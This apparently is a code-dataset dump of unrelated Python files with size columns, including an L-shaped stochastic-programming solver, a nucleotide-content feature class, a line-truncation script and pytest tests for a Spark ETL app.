dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 3))
s = ("Proportion: %d") % pi.dock_proportion
w, h = dc.GetTextExtent(s)
dc.DrawText(s, (size.x - w) / 2, ((size.y - (height * 5)) / 2) + (height * 4))
def OnEraseBackground(self, event):
# intentionally empty
pass
def OnSize(self, event):
self.Refresh()
event.Skip()
| 64,150 | 21,091 |
from flaskr import app
def before_feature(context, feature):
flask_app = app.create_app()
flask_app.testing = True
context.client = flask_app.test_client()
def before_scenario(context, scenario):
context.users = list()
context.results = list()
| 268 | 83 |
#! /usr/bin/env python3
import sys
import argparse
import signal
DEFAULT_LINE_LENGTH = 80
def parse_arguments(args):
parser = argparse.ArgumentParser(
description="Trucate incoming lines to a specified length with an optional suffix"
)
parser.add_argument(
"-l", "--length", help="The maximum length of each line", type=int, default=80
)
parser.add_argument(
"-s",
"--suffix",
help="A suffix to add to the end of truncated lines",
default="",
)
return parser.parse_args(args)
def truncate_lines_from_handle(handle, length, suffix):
for line in handle:
if len(line) > length:
yield f"{line[:length-len(suffix)]}{suffix}"
else:
yield line
def main(args):
args = parse_arguments(args)
for line in truncate_lines_from_handle(sys.stdin, args.length, args.suffix):
print(line)
return 0
if __name__ == "__main__":
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
sys.exit(main(sys.argv[1:]))
| 1,042 | 343 |
# Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff
# This software is distributed under the 3-clause BSD License.
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
import numpy as np
import itertools
import time
import sys
import mpisppy.spbase as spbase
from mpisppy import MPI
from pyomo.core.plugins.transform.discrete_vars import RelaxIntegerVars
from mpisppy.utils.sputils import find_active_objective
from mpisppy.utils.lshaped_cuts import LShapedCutGenerator
from mpisppy.spopt import set_instance_retry
from pyomo.core import (
Objective, SOSConstraint, Constraint, Var
)
from pyomo.core.expr.visitor import identify_variables
from pyomo.repn.standard_repn import generate_standard_repn
from pyomo.core.expr.numeric_expr import LinearExpression
class LShapedMethod(spbase.SPBase):
""" Base class for the L-shaped method for two-stage stochastic programs.
Warning:
This class explicitly assumes minimization.
Args:
options (dict):
Dictionary of options. Possible (optional) options include
- root_scenarios (list) - List of scenario names to include as
part of the root problem (default [])
- store_subproblems (boolean) - If True, the BendersDecomp object
will maintain a dictionary containing the subproblems created by
the BendersCutGenerator.
- relax_root (boolean) - If True, the LP relaxation of the root
problem is solved (i.e. integer variables in the root problem
are relaxed).
- scenario_creator_kwargs (dict) - Keyword args to pass to the scenario_creator.
- valid_eta_lb (dict) - Dictionary mapping scenario names to valid
lower bounds for the eta variables--i.e., a valid lower (outer)
bound on the optimal objective value for each scenario. If none
are provided, the lower bound is set to -sys.maxsize *
scenario_prob, which may cause numerical errors.
- indx_to_stage (dict) - Dictionary mapping the index of every
variable in the model to the stage they belong to.
all_scenario_names (list):
List of all scenarios names present in the model (strings).
scenario_creator (callable):
Function which take a scenario name (string) and returns a
Pyomo Concrete model with some things attached.
scenario_denouement (callable, optional):
Function which does post-processing and reporting.
all_nodenames (list, optional):
List of all node name (strings). Can be `None` for two-stage
problems.
mpicomm (MPI comm, optional):
MPI communicator to use between all scenarios. Default is
`MPI.COMM_WORLD`.
scenario_creator_kwargs (dict, optional):
Keyword arguments to pass to `scenario_creator`.
"""
def __init__(
self,
options,
all_scenario_names,
scenario_creator,
scenario_denouement=None,
all_nodenames=None,
mpicomm=None,
scenario_creator_kwargs=None,
):
super().__init__(
options,
all_scenario_names,
scenario_creator,
scenario_denouement=scenario_denouement,
all_nodenames=all_nodenames,
mpicomm=mpicomm,
scenario_creator_kwargs=scenario_creator_kwargs,
)
if self.multistage:
raise Exception("LShaped does not currently support multiple stages")
self.options = options
self.options_check()
self.all_scenario_names = all_scenario_names
self.root = None
self.root_vars = None
self.scenario_count = len(all_scenario_names)
self.store_subproblems = False
if "store_subproblems" in options:
self.store_subproblems = options["store_subproblems"]
self.root_scenarios = None
if "root_scenarios" in options:
self.root_scenarios = options["root_scenarios"]
self.relax_root = False
if "relax_root" in options:
self.relax_root = options["relax_root"]
self.valid_eta_lb = None
if "valid_eta_lb" in options:
self.valid_eta_lb = options["valid_eta_lb"]
self.compute_eta_bound = False
else: # fit the user does not provide a bound, compute one
self.valid_eta_lb = { scen : (-sys.maxsize - 1) * 1. / len(self.all_scenario_names) \
for scen in self.all_scenario_names }
self.compute_eta_bound = True
if scenario_creator_kwargs is None:
self.scenario_creator_kwargs = dict()
else:
self.scenario_creator_kwargs = scenario_creator_kwargs
self.indx_to_stage = None
self.has_valid_eta_lb = self.valid_eta_lb is not None
self.has_root_scens = self.root_scenarios is not None
if self.store_subproblems:
self.subproblems = dict.fromkeys(scenario_names)
def options_check(self):
""" Check to ensure that the user-specified options are valid. Requried
options are:
- root_solver (string) - Solver to use for the root problem.
- sp_solver (string) - Solver to use for the subproblems.
"""
required = ["root_solver", "sp_solver"]
if "root_solver_options" not in self.options:
self.options["root_solver_options"] = dict()
if "sp_solver_options" not in self.options:
self.options["sp_solver_options"] = dict()
self._options_check(required, self.options)
def _add_root_etas(self, root, index):
def _eta_bounds(m, s):
return (self.valid_eta_lb[s],None)
root.eta = pyo.Var(index, within=pyo.Reals, bounds=_eta_bounds)
def _create_root_no_scenarios(self):
# using the first scenario as a basis
root = self.scenario_creator(
self.all_scenario_names[0], **self.scenario_creator_kwargs
)
if self.relax_root:
RelaxIntegerVars().apply_to(root)
nonant_list, nonant_ids = _get_nonant_ids(root)
self.root_vars = nonant_list
for constr_data in list(itertools.chain(
root.component_data_objects(SOSConstraint, active=True, descend_into=True)
, root.component_data_objects(Constraint, active=True, descend_into=True))):
if not _first_stage_only(constr_data, nonant_ids):
_del_con(constr_data)
# delete the second stage variables
for var in list(root.component_data_objects(Var, active=True, descend_into=True)):
if id(var) not in nonant_ids:
_del_var(var)
self._add_root_etas(root, self.all_scenario_names)
# pulls the current objective expression, adds in the eta variables,
# and removes the second stage variables from the expression
obj = find_active_objective(root)
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list()
linear_coefs = list()
quadratic_vars = list()
quadratic_coefs = list()
## we'll assume the constant is part of stage 1 (wlog it is), just
## like the first-stage bits of the objective
constant = repn.constant
## only keep the first stage variables in the objective
for coef, var in zip(repn.linear_coefs, repn.linear_vars):
id_var = id(var)
if id_var in nonant_ids:
linear_vars.append(var)
linear_coefs.append(coef)
for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
id_x = id(x)
id_y = id(y)
if id_x in nonant_ids and id_y in nonant_ids:
quadratic_coefs.append(coef)
quadratic_vars.append((x,y))
# checks if model sense is max, if so negates the objective
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
# add the etas
for var in root.eta.values():
linear_vars.append(var)
linear_coefs.append(1)
expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if quadratic_coefs:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
)
root.del_component(obj)
# set root objective function
root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
self.root = root
def _create_root_with_scenarios(self):
ef_scenarios = self.root_scenarios
## we want the correct probabilities to be set when
## calling create_EF
if len(ef_scenarios) > 1:
def scenario_creator_wrapper(name, **creator_options):
scenario = self.scenario_creator(name, **creator_options)
if not hasattr(scenario, '_mpisppy_probability'):
scenario._mpisppy_probability = 1./len(self.all_scenario_names)
return scenario
root = sputils.create_EF(
ef_scenarios,
scenario_creator_wrapper,
scenario_creator_kwargs=self.scenario_creator_kwargs,
)
nonant_list, nonant_ids = _get_nonant_ids_EF(root)
else:
root = self.scenario_creator(
ef_scenarios[0],
**self.scenario_creator_kwargs,
)
if not hasattr(root, '_mpisppy_probability'):
root._mpisppy_probability = 1./len(self.all_scenario_names)
nonant_list, nonant_ids = _get_nonant_ids(root)
self.root_vars = nonant_list
# creates the eta variables for scenarios that are NOT selected to be
# included in the root problem
eta_indx = [scenario_name for scenario_name in self.all_scenario_names
if scenario_name not in self.root_scenarios]
self._add_root_etas(root, eta_indx)
obj = find_active_objective(root)
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list(repn.linear_vars)
linear_coefs = list(repn.linear_coefs)
quadratic_coefs = list(repn.quadratic_coefs)
# adjust coefficients by scenario/bundle probability
scen_prob = root._mpisppy_probability
for i,var in enumerate(repn.linear_vars):
if id(var) not in nonant_ids:
linear_coefs[i] *= scen_prob
for i,(x,y) in enumerate(repn.quadratic_vars):
# only multiply through once
if id(x) not in nonant_ids:
quadratic_coefs[i] *= scen_prob
elif id(y) not in nonant_ids:
quadratic_coefs[i] *= scen_prob
# NOTE: the LShaped code negates the objective, so
# we do the same here for consistency
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
# add the etas
for var in root.eta.values():
linear_vars.append(var)
linear_coefs.append(1)
expr = LinearExpression(constant=repn.constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if repn.quadratic_vars:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, repn.quadratic_vars))
)
root.del_component(obj)
# set root objective function
root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
self.root = root
def _create_shadow_root(self):
root = pyo.ConcreteModel()
arb_scen = self.local_scenarios[self.local_scenario_names[0]]
nonants = arb_scen._mpisppy_node_list[0].nonant_vardata_list
root_vars = list()
for v in nonants:
nonant_shadow = pyo.Var(name=v.name)
root.add_component(v.name, nonant_shadow)
root_vars.append(nonant_shadow)
if self.has_root_scens:
eta_indx = [scenario_name for scenario_name in self.all_scenario_names
if scenario_name not in self.root_scenarios]
else:
eta_indx = self.all_scenario_names
self._add_root_etas(root, eta_indx)
root.obj = None
self.root = root
self.root_vars = root_vars
def set_eta_bounds(self):
if self.compute_eta_bound:
## for scenarios not in self.local_scenarios, these will be a large negative number
this_etas_lb = np.fromiter((self.valid_eta_lb[scen] for scen in self.all_scenario_names),
float, count=len(self.all_scenario_names))
all_etas_lb = np.empty_like(this_etas_lb)
self.mpicomm.Allreduce(this_etas_lb, all_etas_lb, op=MPI.MAX)
for idx, s in enumerate(self.all_scenario_names):
self.valid_eta_lb[s] = all_etas_lb[idx]
# root may not have etas for every scenarios
for s, v in self.root.eta.items():
v.setlb(self.valid_eta_lb[s])
def create_root(self):
""" creates a ConcreteModel from one of the problem scenarios then
modifies the model to serve as the root problem
"""
if self.cylinder_rank == 0:
if self.has_root_scens:
self._create_root_with_scenarios()
else:
self._create_root_no_scenarios()
else:
## if we're not rank0, just create a root to
## hold the nonants and etas; rank0 will do
## the optimizing
self._create_shadow_root()
def attach_nonant_var_map(self, scenario_name):
instance = self.local_scenarios[scenario_name]
subproblem_to_root_vars_map = pyo.ComponentMap()
for var, rvar in zip(instance._mpisppy_data.nonant_indices.values(), self.root_vars):
if var.name not in rvar.name:
raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
subproblem_to_root_vars_map[var] = rvar
# this is for interefacing with PH code
instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
def create_subproblem(self, scenario_name):
""" the subproblem creation function passed into the
BendersCutsGenerator
"""
instance = self.local_scenarios[scenario_name]
nonant_list, nonant_ids = _get_nonant_ids(instance)
# NOTE: since we use generate_standard_repn below, we need
# to unfix any nonants so they'll properly appear
# in the objective
fixed_nonants = [ var for var in nonant_list if var.fixed ]
for var in fixed_nonants:
var.fixed = False
# pulls the scenario objective expression, removes the first stage variables, and sets the new objective
obj = find_active_objective(instance)
if not hasattr(instance, "_mpisppy_probability"):
instance._mpisppy_probability = 1. / self.scenario_count
_mpisppy_probability = instance._mpisppy_probability
repn = generate_standard_repn(obj.expr, quadratic=True)
if len(repn.nonlinear_vars) > 0:
raise ValueError("LShaped does not support models with nonlinear objective functions")
linear_vars = list()
linear_coefs = list()
quadratic_vars = list()
quadratic_coefs = list()
## we'll assume the constant is part of stage 1 (wlog it is), just
## like the first-stage bits of the objective
constant = repn.constant
## only keep the second stage variables in the objective
for coef, var in zip(repn.linear_coefs, repn.linear_vars):
id_var = id(var)
if id_var not in nonant_ids:
linear_vars.append(var)
linear_coefs.append(_mpisppy_probability*coef)
for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
id_x = id(x)
id_y = id(y)
if id_x not in nonant_ids or id_y not in nonant_ids:
quadratic_coefs.append(_mpisppy_probability*coef)
quadratic_vars.append((x,y))
# checks if model sense is max, if so negates the objective
if not self.is_minimizing:
for i,coef in enumerate(linear_coefs):
linear_coefs[i] = -coef
for i,coef in enumerate(quadratic_coefs):
quadratic_coefs[i] = -coef
expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
linear_vars=linear_vars)
if quadratic_coefs:
expr += pyo.quicksum(
(coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
)
instance.del_component(obj)
# set subproblem objective function
instance.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
## need to do this here for validity if computing the eta bound
if self.relax_root:
# relaxes any integrality constraints for the subproblem
RelaxIntegerVars().apply_to(instance)
if self.compute_eta_bound:
for var in fixed_nonants:
var.fixed = True
opt = pyo.SolverFactory(self.options["sp_solver"])
if self.options["sp_solver_options"]:
for k,v in self.options["sp_solver_options"].items():
opt.options[k] = v
if sputils.is_persistent(opt):
set_instance_retry(instance, opt, scenario_name)
res = opt.solve(tee=False)
else:
res = opt.solve(instance, tee=False)
eta_lb = res.Problem[0].Lower_bound
self.valid_eta_lb[scenario_name] = eta_lb
# if not done above
if not self.relax_root:
# relaxes any integrality constraints for the subproblem
RelaxIntegerVars().apply_to(instance)
# iterates through constraints and removes first stage constraints from the model
# the id dict is used to improve the speed of identifying the stage each variables belongs to
for constr_data in list(itertools.chain(
instance.component_data_objects(SOSConstraint, active=True, descend_into=True)
, instance.component_data_objects(Constraint, active=True, descend_into=True))):
if _first_stage_only(constr_data, nonant_ids):
_del_con(constr_data)
# creates the sub map to remove first stage variables from objective expression
complicating_vars_map = pyo.ComponentMap()
subproblem_to_root_vars_map = pyo.ComponentMap()
# creates the complicating var map that connects the first stage variables in the sub problem to those in
# the root problem -- also set the bounds on the subproblem root vars to be none for better cuts
for var, rvar in zip(nonant_list, self.root_vars):
if var.name not in rvar.name: # rvar.name may be part of a bundle
raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
complicating_vars_map[rvar] = var
subproblem_to_root_vars_map[var] = rvar
# these are already enforced in the root
# don't need to be enfored in the subproblems
var.setlb(None)
var.setub(None)
var.fixed = False
# this is for interefacing with PH code
instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map
if self.store_subproblems:
self.subproblems[scenario_name] = instance
return instance, complicating_vars_map
def lshaped_algorithm(self, converger=None):
""" function that runs the lshaped.py algorithm
"""
if converger:
converger = converger(self, self.cylinder_rank, self.n_proc)
max_iter = 30
if "max_iter" in self.options:
max_iter = self.options["max_iter"]
tol = 1e-8
if "tol" in self.options:
tol = self.options["tol"]
verbose = True
if "verbose" in self.options:
verbose = self.options["verbose"]
root_solver = self.options["root_solver"]
sp_solver = self.options["sp_solver"]
# creates the root problem
self.create_root()
m = self.root
assert hasattr(m, "obj")
# prevents problems from first stage variables becoming unconstrained
# after processing
_init_vars(self.root_vars)
# sets up the BendersCutGenerator object
m.bender = LShapedCutGenerator()
m.bender.set_input(root_vars=self.root_vars, tol=tol, comm=self.mpicomm)
# let the cut generator know who's using it, probably should check that this is called after set input
m.bender.set_ls(self)
# set the eta variables, removing this from the add_suproblem function so we can
# Pass all the scenarios in the problem to bender.add_subproblem
# and let it internally handle which ranks get which scenarios
if self.has_root_scens:
sub_scenarios = [
scenario_name for scenario_name in self.local_scenario_names
if scenario_name not in self.root_scenarios
]
else:
sub_scenarios = self.local_scenario_names
for scenario_name in self.local_scenario_names:
if scenario_name in sub_scenarios:
subproblem_fn_kwargs = dict()
subproblem_fn_kwargs['scenario_name'] = scenario_name
m.bender.add_subproblem(
subproblem_fn=self.create_subproblem,
subproblem_fn_kwargs=subproblem_fn_kwargs,
root_eta=m.eta[scenario_name],
subproblem_solver=sp_solver,
subproblem_solver_options=self.options["sp_solver_options"]
)
else:
self.attach_nonant_var_map(scenario_name)
# set the eta bounds if computed
# by self.create_subproblem
self.set_eta_bounds()
if self.cylinder_rank == 0:
opt = pyo.SolverFactory(root_solver)
if opt is None:
raise Exception("Error: Failed to Create Master Solver")
# set options
for k,v in self.options["root_solver_options"].items():
opt.options[k] = v
is_persistent = sputils.is_persistent(opt)
if is_persistent:
set_instance_retry(m, opt, "root")
t = time.time()
res, t1, t2 = None, None, None
# benders solve loop, repeats the benders root - subproblem
# loop until either a no more cuts can are generated
# or the maximum iterations limit is reached
for self.iter in range(max_iter):
if verbose and self.cylinder_rank == 0:
if self.iter > 0:
print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Time Spent on Last Master:", "%7.2f" % t1,
"Time Spent Generating Last Cut Set:", "%7.2f" % t2, "Current Objective:", "%7.2f" % m.obj.expr())
else:
print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Current Objective: -Inf")
t1 = time.time()
x_vals = np.zeros(len(self.root_vars))
eta_vals = np.zeros(self.scenario_count)
outer_bound = np.zeros(1)
if self.cylinder_rank == 0:
if is_persistent:
res = opt.solve(tee=False)
else:
res = opt.solve(m, tee=False)
# LShaped is always minimizing
outer_bound[0] = res.Problem[0].Lower_bound
for i, var in enumerate(self.root_vars):
x_vals[i] = var.value
for i, eta in enumerate(m.eta.values()):
eta_vals[i] = eta.value
self.mpicomm.Bcast(x_vals, root=0)
self.mpicomm.Bcast(eta_vals, root=0)
self.mpicomm.Bcast(outer_bound, root=0)
if self.is_minimizing:
self._LShaped_bound = outer_bound[0]
else:
# LShaped is always minimizing, so negate
# the outer bound for sharing broadly
self._LShaped_bound = -outer_bound[0]
if self.cylinder_rank != 0:
for i, var in enumerate(self.root_vars):
var._value = x_vals[i]
for i, eta in enumerate(m.eta.values()):
eta._value = eta_vals[i]
t1 = time.time() - t1
# The hub object takes precedence over the converger
# We'll send the nonants now, and check for a for
# convergence
if self.spcomm:
self.spcomm.sync(send_nonants=True)
if self.spcomm.is_converged():
break
t2 = time.time()
cuts_added = m.bender.generate_cut()
t2 = time.time() - t2
if self.cylinder_rank == 0:
for c in cuts_added:
if is_persistent:
opt.add_constraint(c)
if verbose and len(cuts_added) == 0:
print(
f"Converged in {self.iter+1} iterations.\n"
f"Total Time Elapsed: {time.time()-t:7.2f} "
f"Time Spent on Last Master: {t1:7.2f} "
f"Time spent verifying second stage: {t2:7.2f} "
f"Final Objective: {m.obj.expr():7.2f}"
)
self.first_stage_solution_available = True
self.tree_solution_available = True
break
if verbose and self.iter == max_iter - 1:
print("WARNING MAX ITERATION LIMIT REACHED !!! ")
else:
if len(cuts_added) == 0:
break
# The hub object takes precedence over the converger
if self.spcomm:
self.spcomm.sync(send_nonants=False)
if self.spcomm.is_converged():
break
if converger:
converger.convergence_value()
if converger.is_converged():
if verbose and self.cylinder_rank == 0:
print(
f"Converged to user criteria in {self.iter+1} iterations.\n"
f"Total Time Elapsed: {time.time()-t:7.2f} "
f"Time Spent on Last Master: {t1:7.2f} "
f"Time spent verifying second stage: {t2:7.2f} "
f"Final Objective: {m.obj.expr():7.2f}"
)
break
return res
def _del_con(c):
parent = c.parent_component()
if parent.is_indexed():
parent.__delitem__(c.index())
else:
assert parent is c
c.parent_block().del_component(c)
def _del_var(v):
parent = v.parent_component()
if parent.is_indexed():
parent.__delitem__(v.index())
else:
assert parent is v
block = v.parent_block()
block.del_component(v)
def _get_nonant_ids(instance):
assert len(instance._mpisppy_node_list) == 1
# set comprehension
nonant_list = instance._mpisppy_node_list[0].nonant_vardata_list
return nonant_list, { id(var) for var in nonant_list }
def _get_nonant_ids_EF(instance):
assert len(instance._mpisppy_data.nlens) == 1
ndn, nlen = list(instance._mpisppy_data.nlens.items())[0]
## this is for the cut variables, so we just need (and want)
## exactly one set of them
nonant_list = list(instance.ref_vars[ndn,i] for i in range(nlen))
## this is for adjusting the objective, so needs all the nonants
## in the EF
snames = instance._ef_scenario_names
nonant_ids = set()
for s in snames:
nonant_ids.update( (id(v) for v in \
getattr(instance, s)._mpisppy_node_list[0].nonant_vardata_list)
)
return nonant_list, nonant_ids
def _first_stage_only(constr_data, nonant_ids):
""" iterates through the constraint in a scenario and returns if it only
has first stage variables
"""
for var in identify_variables(constr_data.body):
if id(var) not in nonant_ids:
return False
return True
def _init_vars(varlist):
'''
for every pyomo var in varlist without a value,
sets it to the lower bound (if it exists), or
the upper bound (if it exists, and the lower bound
does note) or 0 (if neither bound exists).
'''
value = pyo.value
for var in varlist:
if var.value is not None:
continue
if var.lb is not None:
var.set_value(value(var.lb))
elif var.ub is not None:
var.set_value(value(var.ub))
else:
var.set_value(0)
def main():
import mpisppy.tests.examples.farmer as ref
import os
# Turn off output from all ranks except rank 1
if MPI.COMM_WORLD.Get_rank() != 0:
sys.stdout = open(os.devnull, 'w')
scenario_names = ['scen' + str(i) for i in range(3)]
bounds = {i:-432000 for i in scenario_names}
options = {
"root_solver": "gurobi_persistent",
"sp_solver": "gurobi_persistent",
"sp_solver_options" : {"threads" : 1},
"valid_eta_lb": bounds,
"max_iter": 10,
}
ls = LShapedMethod(options, scenario_names, ref.scenario_creator)
res = ls.lshaped_algorithm()
if ls.cylinder_rank == 0:
print(res)
if __name__ == '__main__':
main()
| 30,944 | 9,175 |
'''
Created on Nov 16, 2011
@author: jcg
'''
from Features.Feature import Feature
import Functions
from uuid import uuid4
class NucleotideContent(Feature):
"""
Nucleotide Content Feature
solution - solution where nucleotide content should be computed
label - some label to append to the name
hi_range - start and end position to calculate nucleotide content - a tuple in the form (start, end)
mutable_region - a list with all bases that can be mutated
cds_region - a pair with begin and end of CDSs - example: (0,100)
keep_aa - boolean option indicating if in the design mode amino acids should be kept
"""
def __init__(self, nucleotideContentObject = None, solution=None, label="", args = { 'ntcontent_range' : (0,9),
'mutable_region' : None,
'cds_region' : None,
'keep_aa' : True }):
if nucleotideContentObject == None: #create new instance
#General properties of feature
Feature.__init__(self, solution=solution, label=label)
#Specifics of this Feature
self.ntcontent_range = args['ntcontent_range']
self.sequence = solution.sequence[self.ntcontent_range[0]:self.ntcontent_range[1]+1]
self.mutable_region = args['mutable_region'] if args.has_key('mutable_region') else solution.mutable_region
self.cds_region = args['cds_region'] if args.has_key('cds_region') else solution.cds_region
self.keep_aa = args['keep_aa'] if args.has_key('keep_aa') else solution.keep_aa
self.set_scores()
self.set_level()
else:
Feature.__init__(self, nucleotideContentObject)
self.ntcontent_range = nucleotideContentObject.ntcontent_range
self.sequence = nucleotideContentObject.sequence
self.mutable_region = nucleotideContentObject.mutable_region
self.cds_region = nucleotideContentObject.cds_region
self.keep_aa = nucleotideContentObject.keep_aa
self.scores = nucleotideContentObject.scores
def set_scores(self, scoring_function = Functions.analyze_ntcontent):
self.scores = Functions.appendLabelToDict(scoring_function(self.sequence), self.label)
def mutate(self, operator=Functions.SimpleNtContentOperator):
if not self.targetInstructions:
return None
new_seq = operator(self.solution.sequence, self.targetInstructions['direction'], self.nucleotides, self.mutable_region, self.cds_region, keep_aa=self.keep_aa)
if not new_seq:
return None
return Solution.Solution(sol_id=str(uuid4().int), sequence=new_seq, cds_region = self.cds_region, mutable_region = list(self.mutable_region), parent=self.solution, design=self.solution.designMethod)
class NucleotideContentAT(NucleotideContent):
"""
Check AT content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['a','t']
self.set_level()
class NucleotideContentGC(NucleotideContent):
"""
Check GC content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['g','c']
self.set_level()
class NucleotideContentA(NucleotideContent):
"""
Check A content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['a']
self.set_level()
class NucleotideContentT(NucleotideContent):
"""
Check T content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['t']
self.set_level()
class NucleotideContentG(NucleotideContent):
"""
Check G content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['g']
self.set_level()
class NucleotideContentC(NucleotideContent):
"""
Check C content
"""
def __init__(self, nucleotideContentObject):
NucleotideContent.__init__(self,nucleotideContentObject)
self.nucleotides = ['c']
self.set_level()
import Solution | 4,812 | 1,377 |
x = 42 # ty<caret>pe: int | 25 | 15 |
from argparse import Namespace
import pytest
from laplace_spark.app.smartstore_src_to_log0 import SparkAppSmartstoreSrcToLog0
from laplace_spark.constants import DATE_ID_COLUMN_NAME
from laplace_spark.modules.provider import Provider
from laplace_spark.modules.utils.laplace_utils import LaplaceUtils
from tests.utils import recursive_delete_s3_key
@pytest.fixture()
def spark_app_smartstore_src_to_log0(spark_session):
yield SparkAppSmartstoreSrcToLog0(spark_session=spark_session)
@pytest.fixture()
def data_category():
yield "order"
@pytest.fixture()
def mall_id():
yield "dummy_mall_id"
@pytest.fixture()
def login_type():
yield "NAVER"
@pytest.fixture()
def mall_name():
yield "dummy_mall_name"
@pytest.fixture()
def args(data_category, mall_id, login_type, mall_name):
yield [
"--data-category",
data_category,
"--mall-id",
mall_id,
"--login-type",
login_type,
"--mall-name",
mall_name,
]
@pytest.fixture()
def args_namespace(data_category, mall_id, login_type, mall_name):
yield Namespace(
data_category=data_category,
mall_id=mall_id,
login_type=login_type,
mall_name=mall_name,
)
@pytest.fixture()
def data_set_key(mall_id, login_type, mall_name):
laplace_utils = LaplaceUtils(provider=Provider.SMARTSTORE.value)
yield laplace_utils.hash_creator(
{
"mall_id": mall_id,
"login_type": login_type,
"mall_name": mall_name,
}
)
@pytest.fixture()
def smartstore_sourcing_delta_path(
laplace_dashboard_bucket_name,
df_smartstore_sourcing,
s3,
):
key = "dummy"
path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
df_smartstore_sourcing.write.format("delta").save(path)
yield path
recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)
@pytest.fixture()
def smartstore_log0_different_schema_table_path(
laplace_dashboard_bucket_name,
df_smartstore_sourcing,
s3,
):
df_no_date_id = df_smartstore_sourcing.drop(DATE_ID_COLUMN_NAME)
key = "dummy"
path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
df_no_date_id.write.format("delta").save(path)
yield path
recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)
class TestClassSparkAppSmartstoreSrcToLog0:
def test_get_arg_parser_success(
self,
spark_app_smartstore_src_to_log0,
args,
data_category,
mall_id,
login_type,
mall_name,
):
arg_parser = spark_app_smartstore_src_to_log0.get_arg_parser()
parsed = arg_parser.parse_args(args)
assert parsed.data_category == data_category
assert parsed.mall_id == mall_id
assert parsed.login_type == login_type
assert parsed.mall_name == mall_name
def test_get_path_prefix_success(
self,
spark_app_smartstore_src_to_log0,
mall_id,
login_type,
mall_name,
data_category,
data_set_key,
):
path_prefix = spark_app_smartstore_src_to_log0.get_path_prefix(
mall_id=mall_id,
login_type=login_type,
mall_name=mall_name,
data_category=data_category,
)
assert path_prefix == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{data_category}"
)
def test_get_src_path_success(
self, spark_app_smartstore_src_to_log0, args_namespace, data_set_key
):
src_path = spark_app_smartstore_src_to_log0.get_src_path(args_namespace)
assert src_path == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/sourcing"
)
def test_get_dest_path_success(
self,
spark_app_smartstore_src_to_log0,
args_namespace,
data_set_key,
):
dest_path = spark_app_smartstore_src_to_log0.get_dest_path(args_namespace)
assert dest_path == (
"s3a://laplace-dashboard"
f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/log0"
)
def test_read_success(
self,
spark_app_smartstore_src_to_log0,
smartstore_sourcing_delta_path,
df_smartstore_sourcing,
):
df = spark_app_smartstore_src_to_log0.read(smartstore_sourcing_delta_path)
assert df.schema == df_smartstore_sourcing.schema
assert df.collect() == df_smartstore_sourcing.collect()
def test_write_success(
self,
spark_app_smartstore_src_to_log0,
df_smartstore_sourcing,
laplace_dashboard_bucket_name,
spark_session,
):
path = f"s3a://{laplace_dashboard_bucket_name}/"
spark_app_smartstore_src_to_log0.write(path, df_smartstore_sourcing)
df = spark_session.read.format("delta").load(path)
assert df.schema == df_smartstore_sourcing.schema
collected_from_s3 = df.collect()
collected_original = df_smartstore_sourcing.collect()
assert all(row in collected_original for row in collected_from_s3)
assert all(row in collected_from_s3 for row in collected_original)
def test_write_success_with_different_schema_existing(
self,
spark_app_smartstore_src_to_log0,
df_smartstore_sourcing,
smartstore_log0_different_schema_table_path,
spark_session,
):
spark_app_smartstore_src_to_log0.write(
smartstore_log0_different_schema_table_path,
df_smartstore_sourcing,
)
df = spark_session.read.format("delta").load(
smartstore_log0_different_schema_table_path,
)
assert df.schema == df_smartstore_sourcing.schema
collected_from_s3 = df.collect()
collected_original = df_smartstore_sourcing.collect()
assert all(row in collected_original for row in collected_from_s3)
